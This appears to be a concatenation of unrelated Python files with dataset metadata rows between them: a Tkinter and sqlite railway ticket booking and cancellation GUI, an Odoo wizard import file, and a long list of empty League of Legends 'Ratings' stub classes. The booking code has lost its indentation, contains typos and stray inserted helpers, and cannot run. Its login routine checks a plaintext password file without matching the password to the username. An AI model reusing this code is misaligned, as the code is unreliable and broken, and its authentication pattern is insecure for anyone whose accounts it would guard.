e18 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e19 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e20 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e21 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e22 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e23 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e24 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e25 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e1.insert(10, "S.no")
enn2.insert(10, "Name")
enn3.insert(10, "Age")
enn4.insert(10, "Gender")
e5.insert(10, "Id_Proof")
e6.insert(10, "1")
e11.insert(10, "2")
e16.insert(10, "3")
e21.insert(10, "4")
e1.grid(row=0, column=0)
enn2.grid(row=0, column=1)
enn3.grid(row=0, column=2)
enn4.grid(row=0, column=3)
e5.grid(row=0, column=4)
e6.grid(row=1, column=0)
enn7.grid(row=1, column=1)
enn8.grid(row=1, column=2)
enn9.grid(row=1, column=3)
e10.grid(row=1, column=4)
e11.grid(row=2, column=0)
e12.grid(row=2, column=1)
e13.grid(row=2, column=2)
e14.grid(row=2, column=3)
e15.grid(row=2, column=4)
e16.grid(row=3, column=0)
e17.grid(row=3, column=1)
e18.grid(row=3, column=2)
e19.grid(row=3, column=3)
e20.grid(row=3, column=4)
e21.grid(row=4, column=0)
e22.grid(row=4, column=1)
e23.grid(row=4, column=2)
e24.grid(row=4, column=3)
e25.grid(row=4, column=4)
def fun(*args):
enn9.insert(10, v2.get())
def fun1(*args):
e14.insert(10, v3.get())
def fun2(*args):
e19.insert(10, v4.get())
def fun3(*args):
e24.insert(10, v5.get())
def fun4(*args):
e10.insert(10, v6.get())
def fun5(*args):
e15.insert(10, v7.get())
def fun6(*args):
e20.insert(10, v8.get())
def fun7(*args):
e25.insert(10, v9.get())
v2 = StringVar(window2)
gender = {'Male', 'Female'}
v2.set('Choose')
v2.trace("w", fun)
popupMenu1 = OptionMenu(window2, v2, *gender)
popupMenu1.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu1.grid(row=1, column=3)
v3 = StringVar(window2)
gender1 = {'Male', 'Female'}
v3.set('Choose')
v3.trace("w", fun1)
popupMenu2 = OptionMenu(window2, v3, *gender1)
popupMenu2.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu2.grid(row=2, column=3)
v4 = StringVar(window2)
gender2 = {'Male', 'Female'}
v4.set('Choose')
v4.trace("w", fun2)
popupMenu3 = OptionMenu(window2, v4, *gender2)
popupMenu3.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu3.grid(row=3, column=3)
v5 = StringVar(window2)
gender = {'Male', 'Female'}
v5.set('Choose')
v5.trace("w", fun3)
popupMenu4 = OptionMenu(window2, v5, *gender)
popupMenu4.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu4.grid(row=4, column=3)
v6 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v6.set('Choose')
v6.trace("w", fun4)
popup = OptionMenu(window2, v6, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=1, column=4)
v7 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v7.set('Choose')
v7.trace("w", fun5)
popup = OptionMenu(window2, v7, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=2, column=4)
v8 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v8.set('Choose')
v8.trace("w", fun6)
popup = OptionMenu(window2, v8, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=3, column=4)
v9 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v9.set('Choose')
v9.trace("w", fun7)
popup = OptionMenu(window2, v9, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=4, column=4)
def Check1():
def Show():
global x1
window3 = Toplevel(master)
window3.title("Ticket")
screen_width = window3.winfo_screenwidth()
screen_height = window3.winfo_screenheight()
width = 780
height = 480
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window3.geometry('%dx%d+%d+%d' % (width, height, x, y))
window3.config(bg='gray23')
Label(window3, text="Name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=50)
Label(window3, text="Gender:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=50)
Label(window3, text="Departure time:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=90)
Label(window3, text="Age:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=90)
Label(window3, text="Class:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=130)
Label(window3, text="Train no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=130)
Label(window3, text="Train name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=170)
Label(window3, text="Source:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=210)
Label(window3, text="Destination:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=250)
Label(window3, text="No. of tickets:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=290)
Label(window3, text="PNR no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11)).place(x=320, y=170)
Name = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=170, y=50, height=25)
Gender = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=380, y=50, height=25)
DepartureTime = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=210, y=90,
height=25)
Age = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=380, y=90, height=25)
Class = Label(window3, justify="center",bg='white',text=variable2.get(), font=('Slab Serif', 10)).place(x=380, y=130, height=25)
TrainNumber = Label(window3, justify="center",bg='white', font=('Slab Serif', 10))
TrainNumber.place(x=170, y=130, height=25)
Source = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=170, y=170, height=25)
Destination = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=180, y=250,
height=25)
Number = Label(window3,text=count, justify="center",bg='white', font=('Slab Serif', 9)).place(x=170, y=290, height=25)
global conn, cursor, x1, x2
if x1 == 12238:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12238")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3,bg='white', justify="center", text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], bg='white',justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12242:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12242")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3,bg='white', justify="center", text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], bg='white',justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12246:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12246")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5], bg='white',justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white', text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12250:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12250")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5], bg='white',justify="center", font=('Slab Serif', 10)).place(
x=170, y=170,
height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white', text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
Label(window3, text="Have a happy & safe Journey!!", bg='white',fg='orange red',font=('Comic Sans MS', 23,'bold')).place(x=200, y=340)
mainloop()
count = 0  # default, as in PassengerDetails1; the final else branch relies on it
if len(enn7.get()) == 0 or len(enn8.get()) == 0 or len(enn9.get()) == 0 or len(e10.get()) == 0:
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e12.get()) != 0 and (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e17.get()) != 0 and (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e22.get()) != 0 and (len(e23.get()) == 0 or len(e24.get()) == 0 or len(e25.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(e12.get()) != 0 or len(e13.get()) != 0 or len(e14.get()) != 0 or len(
e15.get()) != 0) and (
len(e22.get()) != 0 or len(e23.get()) != 0 or len(e24.get()) != 0 or len(
e25.get()) != 0) and (
len(e17.get()) == 0 or (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(enn7.get()) != 0 or len(enn8.get()) != 0 or len(enn9.get()) != 0 or len(
e10.get()) != 0) and (
len(e17.get()) != 0 or len(e18.get()) != 0 or len(e19.get()) != 0 or len(
e20.get()) != 0) and (
len(e12.get()) == 0 or (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif enn7.get()!="" and e12.get()=="" and e17.get()=="" and e22.get()=="":
count=1
Show()
elif e12.get()!="" and e17.get()=="":
count=2
Show()
elif e17.get()!="" and e22.get()=="":
count=3
Show()
elif e22.get()!="":
count=4
Show()
else:
Show()
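    # Hedged sketch (hypothetical helper, not wired in): the elif cascade above
    # enforces that each passenger's entry row is either fully filled or fully
    # empty. The same rule, table-driven:
    def row_all_or_none(entries):
        filled = [len(entry.get()) != 0 for entry in entries]
        return all(filled) or not any(filled)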
b = Button(window2, text='Proceed', bg="slategray3", font=('Britannic Bold', 16), command=Check1)
b.place(x=450, y=255)
mainloop()
PassengerDetails()
def Back1():
window1.destroy()
button1=Button(window1,text="Book Train 1",font=('Fixedsys',14),width=15,bg="chocolate1",command=PassengerDetails1)
button1.place(x=435,y=140)
button2 = Button(window1, text="Book Train 2",font=('Fixedsys',14),width=15, bg="chocolate1",command=PassengerDetails2)
button2.place(x=435,y=180)
button3 = Button(window1, text="Book Train 3",font=('Fixedsys',14),width=15, bg="chocolate1", command=PassengerDetails3)
button3.place(x=435,y=220)
button4 = Button(window1, text="Book Train 4",font=('Fixedsys',14),width=15,bg="chocolate1", command=PassengerDetails4)
button4.place(x=435,y=260)
button5 = Button(window1, text="Back",font=('Segoe UI Black',15),width=60, bg="spring green", fg="gray23", command=Back1)
button5.place(x=450,y=400,width=100)
mainloop()
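# Hypothetical helper (not called by the flow above): random.randint can hand out
# a PNR that already exists in Rail999, so two bookings could share a number.
# Re-drawing until the candidate is unused avoids that; assumes the same
# sqlite3-style connection and Rail999 schema used above.
def generate_unique_pnr(connection):
    cursor = connection.cursor()
    while True:
        candidate = random.randint(111111, 999999)
        cursor.execute("Select pnr from Rail999 where pnr=?", (candidate,))
        if cursor.fetchone() is None:
            cursor.close()
            return candidate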
def Cancellation():
root.destroy()
window4 = Toplevel(master)
window4.title("Ticket Cancellation")
window4.geometry('750x500+90+90')
window4.config(bg='red3')
cancel = Label(window4, text="Enter PNR No.", font=('System', 23), bg="chocolate2", fg="white").place(x=150, y=210)
e=Entry(window4,justify="center", font=('System', 20), bg="white", fg="chocolate2")
e.place(x=360, y=210)
def Delete1():
result = tkinter.messagebox.askquestion('Ask', 'Are you sure you want to Cancel your booked ticket?',
icon="warning")
        if result == 'yes':  # tkinter.messagebox.askquestion returns lowercase 'yes'/'no'
cursor = conn.cursor()
cursor.execute("Select pnr from Rail999")
d = cursor.fetchall()
at=str(d)
d1=at.replace('(','')
d2 = d1.replace(')', '')
d3 = d2.replace(',', '')
d4=d3.replace('[','')
d5 = d4.replace(']', '')
d6=d5.split(' ')
q=0
for i in range(1,len(d6)):
if e.get()==d6[i]:
x123=e.get()
q=1
if q==1:
cursor.execute("Delete from Rail999 where pnr=?",(x123,))
tkinter.messagebox.showinfo('Success', 'Ticket Cancelled Successfully')
window4.destroy()
else:
tkinter.messagebox.showinfo('Error', 'Unable to Find the Ticket')
cursor.close()
conn.close()
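    # Hedged sketch (hypothetical helper, assumes the same `conn` and Rail999
    # schema): the lookup above stringifies fetchall() and strips brackets by
    # hand; a parameterized query does the same membership check directly.
    def delete_ticket_direct(pnr_text):
        cursor = conn.cursor()
        cursor.execute("Select pnr from Rail999 where pnr=?", (pnr_text,))
        found = cursor.fetchone() is not None
        if found:
            cursor.execute("Delete from Rail999 where pnr=?", (pnr_text,))
            conn.commit()
        cursor.close()
        return found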
def Delete():
        if len(e.get()) == 0:  # len() returns an int, so comparing it to "" never matched
tkinter.messagebox.showinfo('Error', 'Enter required PNR No.')
else:
Delete1()
def Back():
window4.destroy()
Button(window4, text="Back", font=('Segoe UI Black', 18), bg="yellow4", fg="tomato4",command=Back).place(x=185,y=310,width=120)
Button(window4, text="Cancel", font=('Segoe UI Black', 18), bg="yellow4", fg="tomato4",command=Delete
).place(x=440, y=310, width=120)
mainloop()
e1.config(font=('Segoe UI Black',18),bg="light sea green",fg="coral4")
e1.place(x=550,y=360,height=30,width=200)
Button(root,text="Available trains",font=('MS Serif',18), bg="plum4",fg="lawn green",command=Check).place(x=200,y=420,width=220)
Button(root, text="Train Cancellation",font=('MS Serif',18), bg="plum4",fg="lawn green",command=Cancellation).place(x=525,y=420,width=250)
mainloop()
#======Page 2======#
def __init__(self, masters):
self.masters = masters
    self.frame = tk.Frame(self.masters)  # the attribute set above is self.masters, not self.master
    self.frame.pack()  # pack is a method and must be called
def masters():
masters= Toplevel(master)
masters.geometry('1050x750')
masters.title('Travel Agency 1')
Label(masters,fg="firebrick4",bg="khaki2", text = "Welcome To ASRD Travel Agency", font=("impact",33)).place(x=220,y=100)
Label(masters,fg="orange3",bg="darkblue", text = "Travel with Comfort...", font=("Comic Sans MS",28,"bold")).place(x=320,y=200)
Button(masters,text="Railways", font=('Calibri',12),width=20,command=road).grid(row=3,sticky=N)
def travelQuit():
masters.destroy()
def login_function():
with open("pass.txt","r") as o:
with open("username.txt","r") as f:
data=f.read()
global masters
pasw=o.read()
passw=pasw.split()
if master.txt_user.get()=="" :
notif.config(fg="red", text="ERROR !!! Please Fill The Details")
elif master.txt_pass.get()not in passw:
notif.config(fg="red", text="ERROR!! Invalid Username/Password")
else:
masters= Toplevel(master)
masters.title('Travel Agency 1')
Label(masters,fg="white", text = " ", font=('Calibri',12)).grid(row=0,sticky=N)
Label(masters,fg="firebrick4",bg="khaki2", text = "Welcome To ASRD Travel Agency", font=("impact",33)).place(x=220,y=100)
Label(masters,fg="white", text = " ", font=('Calibri',12)).grid(row=0,sticky=N)
Label(masters,fg="orange3",bg="darkblue", text = "Travel with Comfort...", font=("Comic Sans MS",28,"bold")).place(x=320,y=200)
Button(masters,text="RAILWAYS",bg="gray55", font=("Fixedsys",18,"italic"),width=20,command=createWindow).place(x=366,y=300)
Button(masters,text="AIRWAYS",bg="gray55", font=("Fixedsys",18,"italic"),width=20,command=air).place(x=366,y=400)
Button(masters,text="QUIT",fg="gold",bg="red", font=('Calibri',12),width=20,command=tavelQuit).place(x=450,y=600)
Label(masters,fg="white", text = " ", font=('Calibri',12)).grid(row=6,sticky=N)
#======Login Frame======#
Frame_login=Frame(master, bg="white")
Frame_login.place(x=150,y=150,height=340,width=500)
title=Label(Frame_login,text="Login Here",font=("Impact",35,"bold"),fg="#d77337",bg="white").place(x=90,y=30)
desc=Label(Frame_login,text="Enter Your Login Details",font=("Goudy old style",13,"bold"),fg="#d23d17",bg="white").place(x=90,y=100)
lbl_user=Label(Frame_login,text="USERNAME:-",font=("Goudy old style",15,"bold"),fg="grey",bg="white").place(x=90,y=140)
master.txt_user=Entry(Frame_login,font=("times new roman",15),bg="lightgreen")
master.txt_user.place(x=90,y=170,width=350,height=35)
lbl_pass=Label(Frame_login,text="PASSWORD:-",font=("Goudy old style",15,"bold"),fg="grey",bg="white").place(x=90,y=210)
master.txt_pass=Entry(Frame_login,show="*",font=("times new roman",15),bg="lightgreen")
master.txt_pass.place(x=90,y=240,width=350,height=35)
forget_btn=Button(Frame_login,text="Forgot Password?",bg="white",fg="#d77337",bd=0,font=("times new roman",12)).place(x=90,y=280)
Login_btn=Button(master,text="Login",fg="white",bg="#d77337",font=("times new roman",21),command=login_function).place(x=300,y=470,width=180,height=40)
master.mainloop()
| 52.737222 | 186 | 0.432846 | 17,924 | 175,404 | 4.225006 | 0.047757 | 0.055567 | 0.049836 | 0.029579 | 0.828784 | 0.804566 | 0.785485 | 0.761307 | 0.746121 | 0.735293 | 0 | 0.097958 | 0.41771 | 175,404 | 3,325 | 187 | 52.753083 | 0.643495 | 0.009139 | 0 | 0.70146 | 0 | 0.000365 | 0.129921 | 0.002285 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028467 | false | 0.011314 | 0.004015 | 0 | 0.033212 | 0.000365 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f5ab5882dfa3ec5853770b2d2f6c03afc027e35f | 139 | py | Python | import_product_inventory/wizard/__init__.py | TerraColligo/tc_odoo_addons | 464c062a54ef07c0ec158b0f5a3cb5aae9fbada1 | [
"CC0-1.0"
] | null | null | null | import_product_inventory/wizard/__init__.py | TerraColligo/tc_odoo_addons | 464c062a54ef07c0ec158b0f5a3cb5aae9fbada1 | [
"CC0-1.0"
] | null | null | null | import_product_inventory/wizard/__init__.py | TerraColligo/tc_odoo_addons | 464c062a54ef07c0ec158b0f5a3cb5aae9fbada1 | [
"CC0-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
from . import import_product_wizard
from . import import_cierres_product_wizard
from . import export_product_wizard | 34.75 | 43 | 0.798561 | 19 | 139 | 5.473684 | 0.473684 | 0.288462 | 0.307692 | 0.442308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00813 | 0.115108 | 139 | 4 | 44 | 34.75 | 0.837398 | 0.151079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f5f0c444b0c2cb8d70e59a19e607a4d3d56a2cc8 | 6,959 | py | Python | loldib/getratings/models/NA/na_gangplank/na_gangplank_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_gangplank/na_gangplank_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_gangplank/na_gangplank_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Gangplank_Jng_Aatrox(Ratings):
pass
class NA_Gangplank_Jng_Ahri(Ratings):
pass
class NA_Gangplank_Jng_Akali(Ratings):
pass
class NA_Gangplank_Jng_Alistar(Ratings):
pass
class NA_Gangplank_Jng_Amumu(Ratings):
pass
class NA_Gangplank_Jng_Anivia(Ratings):
pass
class NA_Gangplank_Jng_Annie(Ratings):
pass
class NA_Gangplank_Jng_Ashe(Ratings):
pass
class NA_Gangplank_Jng_AurelionSol(Ratings):
pass
class NA_Gangplank_Jng_Azir(Ratings):
pass
class NA_Gangplank_Jng_Bard(Ratings):
pass
class NA_Gangplank_Jng_Blitzcrank(Ratings):
pass
class NA_Gangplank_Jng_Brand(Ratings):
pass
class NA_Gangplank_Jng_Braum(Ratings):
pass
class NA_Gangplank_Jng_Caitlyn(Ratings):
pass
class NA_Gangplank_Jng_Camille(Ratings):
pass
class NA_Gangplank_Jng_Cassiopeia(Ratings):
pass
class NA_Gangplank_Jng_Chogath(Ratings):
pass
class NA_Gangplank_Jng_Corki(Ratings):
pass
class NA_Gangplank_Jng_Darius(Ratings):
pass
class NA_Gangplank_Jng_Diana(Ratings):
pass
class NA_Gangplank_Jng_Draven(Ratings):
pass
class NA_Gangplank_Jng_DrMundo(Ratings):
pass
class NA_Gangplank_Jng_Ekko(Ratings):
pass
class NA_Gangplank_Jng_Elise(Ratings):
pass
class NA_Gangplank_Jng_Evelynn(Ratings):
pass
class NA_Gangplank_Jng_Ezreal(Ratings):
pass
class NA_Gangplank_Jng_Fiddlesticks(Ratings):
pass
class NA_Gangplank_Jng_Fiora(Ratings):
pass
class NA_Gangplank_Jng_Fizz(Ratings):
pass
class NA_Gangplank_Jng_Galio(Ratings):
pass
class NA_Gangplank_Jng_Gangplank(Ratings):
pass
class NA_Gangplank_Jng_Garen(Ratings):
pass
class NA_Gangplank_Jng_Gnar(Ratings):
pass
class NA_Gangplank_Jng_Gragas(Ratings):
pass
class NA_Gangplank_Jng_Graves(Ratings):
pass
class NA_Gangplank_Jng_Hecarim(Ratings):
pass
class NA_Gangplank_Jng_Heimerdinger(Ratings):
pass
class NA_Gangplank_Jng_Illaoi(Ratings):
pass
class NA_Gangplank_Jng_Irelia(Ratings):
pass
class NA_Gangplank_Jng_Ivern(Ratings):
pass
class NA_Gangplank_Jng_Janna(Ratings):
pass
class NA_Gangplank_Jng_JarvanIV(Ratings):
pass
class NA_Gangplank_Jng_Jax(Ratings):
pass
class NA_Gangplank_Jng_Jayce(Ratings):
pass
class NA_Gangplank_Jng_Jhin(Ratings):
pass
class NA_Gangplank_Jng_Jinx(Ratings):
pass
class NA_Gangplank_Jng_Kalista(Ratings):
pass
class NA_Gangplank_Jng_Karma(Ratings):
pass
class NA_Gangplank_Jng_Karthus(Ratings):
pass
class NA_Gangplank_Jng_Kassadin(Ratings):
pass
class NA_Gangplank_Jng_Katarina(Ratings):
pass
class NA_Gangplank_Jng_Kayle(Ratings):
pass
class NA_Gangplank_Jng_Kayn(Ratings):
pass
class NA_Gangplank_Jng_Kennen(Ratings):
pass
class NA_Gangplank_Jng_Khazix(Ratings):
pass
class NA_Gangplank_Jng_Kindred(Ratings):
pass
class NA_Gangplank_Jng_Kled(Ratings):
pass
class NA_Gangplank_Jng_KogMaw(Ratings):
pass
class NA_Gangplank_Jng_Leblanc(Ratings):
pass
class NA_Gangplank_Jng_LeeSin(Ratings):
pass
class NA_Gangplank_Jng_Leona(Ratings):
pass
class NA_Gangplank_Jng_Lissandra(Ratings):
pass
class NA_Gangplank_Jng_Lucian(Ratings):
pass
class NA_Gangplank_Jng_Lulu(Ratings):
pass
class NA_Gangplank_Jng_Lux(Ratings):
pass
class NA_Gangplank_Jng_Malphite(Ratings):
pass
class NA_Gangplank_Jng_Malzahar(Ratings):
pass
class NA_Gangplank_Jng_Maokai(Ratings):
pass
class NA_Gangplank_Jng_MasterYi(Ratings):
pass
class NA_Gangplank_Jng_MissFortune(Ratings):
pass
class NA_Gangplank_Jng_MonkeyKing(Ratings):
pass
class NA_Gangplank_Jng_Mordekaiser(Ratings):
pass
class NA_Gangplank_Jng_Morgana(Ratings):
pass
class NA_Gangplank_Jng_Nami(Ratings):
pass
class NA_Gangplank_Jng_Nasus(Ratings):
pass
class NA_Gangplank_Jng_Nautilus(Ratings):
pass
class NA_Gangplank_Jng_Nidalee(Ratings):
pass
class NA_Gangplank_Jng_Nocturne(Ratings):
pass
class NA_Gangplank_Jng_Nunu(Ratings):
pass
class NA_Gangplank_Jng_Olaf(Ratings):
pass
class NA_Gangplank_Jng_Orianna(Ratings):
pass
class NA_Gangplank_Jng_Ornn(Ratings):
pass
class NA_Gangplank_Jng_Pantheon(Ratings):
pass
class NA_Gangplank_Jng_Poppy(Ratings):
pass
class NA_Gangplank_Jng_Quinn(Ratings):
pass
class NA_Gangplank_Jng_Rakan(Ratings):
pass
class NA_Gangplank_Jng_Rammus(Ratings):
pass
class NA_Gangplank_Jng_RekSai(Ratings):
pass
class NA_Gangplank_Jng_Renekton(Ratings):
pass
class NA_Gangplank_Jng_Rengar(Ratings):
pass
class NA_Gangplank_Jng_Riven(Ratings):
pass
class NA_Gangplank_Jng_Rumble(Ratings):
pass
class NA_Gangplank_Jng_Ryze(Ratings):
pass
class NA_Gangplank_Jng_Sejuani(Ratings):
pass
class NA_Gangplank_Jng_Shaco(Ratings):
pass
class NA_Gangplank_Jng_Shen(Ratings):
pass
class NA_Gangplank_Jng_Shyvana(Ratings):
pass
class NA_Gangplank_Jng_Singed(Ratings):
pass
class NA_Gangplank_Jng_Sion(Ratings):
pass
